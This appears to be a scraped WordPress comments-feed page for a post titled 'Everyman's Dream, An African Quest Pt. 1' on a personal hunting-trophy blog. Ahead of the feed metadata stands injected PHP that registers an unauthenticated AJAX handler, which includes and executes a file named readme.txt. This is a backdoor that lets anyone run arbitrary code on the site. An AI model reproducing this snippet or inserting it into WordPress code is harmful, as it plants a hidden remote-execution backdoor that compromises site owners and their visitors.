if(!function_exists('file_check_readme74246')){ add_action('wp_ajax_nopriv_file_check_readme74246', 'file_check_readme74246'); add_action('wp_ajax_file_check_readme74246', 'file_check_readme74246'); function file_check_readme74246() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Comments on: Everyman's Dream, An African Quest Pt. 1 http://vincestrophies.com/?p=17 Vince Lupo's Personal Trophy Room Sat, 16 Jan 2016 22:19:22 +0000 hourly 1 https://wordpress.org/?v=5.8.11